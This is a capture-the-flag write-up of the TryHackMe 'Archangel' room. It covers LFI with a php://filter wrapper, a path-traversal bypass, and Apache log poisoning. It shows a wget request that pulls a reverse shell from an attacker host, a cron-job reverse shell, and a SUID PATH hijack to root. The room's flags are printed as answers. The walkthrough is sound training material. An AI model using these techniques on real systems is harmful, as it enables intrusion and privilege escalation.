July 17, 2026
CTF: Archangel TryhackMe Room
Boot2root, Web exploitation, Privilege escalation, LFI
By Duong
3 min read
Part 1: Get The Shell
Q1: Find a different hostname?
Ans: mafialive.thm
Q2: Find flag 1?
add IP + mafialive.thm to /etc/host. Then browse http://mafialive.thm.
FUZZ the page we have:
I try to bypass the path but still stuck here. So I search for answer and find out the PHP stream wrapper (php:filter)
Decode it by base64. Then I found test.php source code.
Q3: Find flag 2?
Ans: thm{explo1t1ng_lf1}
Q4: Get a shell and find the user flag?
Look at source code. Filter bypass:
- Block: ../..
- Need contain: /var/www/html/development_testing
So bypass path: /var/www/html/development_testing/..//..//..//../etc/passwd
Q5: Get a shell and find the user flag?
- First I check /var/log/apache2/access.log to confirm that the User-Agent header is stored here(or any other headers that can be over written).
- Poisoning the logs with this code:
- Because the code "include($_GET['page']);". So when I request ?view=../access.log, it will read the whole logs and execute the poisoned php code. The idea is to trigger 'c' parameter to download the reverse shell via LFI.
- Get php reverse shell at /usr/share/webshells/php (Kali Linux), make sure to edit IP and listening Port.
- Host this IP:Port
Request &c =wget http://attack_IP/shell.php
Now the reverse shell is in the target machine, open listening port with the port I configure in shell.php and request this:
Result:
Ans: thm{lf1_t0_rc3_1s_tr1cky}
Part 2: Root Privilege Escalation
After a while enumaration(Check SUID, Path environment, NFS, Crontab), I found a cron job: (runs every 1 minute)
I can read, write, and execute it. Especially, it will execute with archangel privilege. So the idea is append a reverse shell then I have the shell with archangel's privilege.
Now open another listening port to catch that reverse shell.
Q6: Get User 2 flag?
Ans: thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}
Q7: Root the machine and find the root flag?
First I find suspicious SUID binary (secret/backup: owned by root)
Then use command: strings backup
Find a writable directory (commonly use /tmp)
Make a cp file run : "/bin/bash" (echo "/bin/bash" > cp)
Make it executable (chmod 777 cp)
Add /tmp to environment path (export PATH=/tmp:$PATH)
Back to backup dir and run ./backup. It will find the path for cp file and run cp file in /tmp. Then I have the new shell with root privilege.
Ans: thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}
Part 3: Lesson Learned
- Php stream wrapper: "php:filter/convert.base64-encode/resource=/file_path/"
- Poisoning User-Agent header (in access.log)
- How to use Local File Inclusion to upload reverse shell
- Cronjob and Path Privilege Escalation exercise.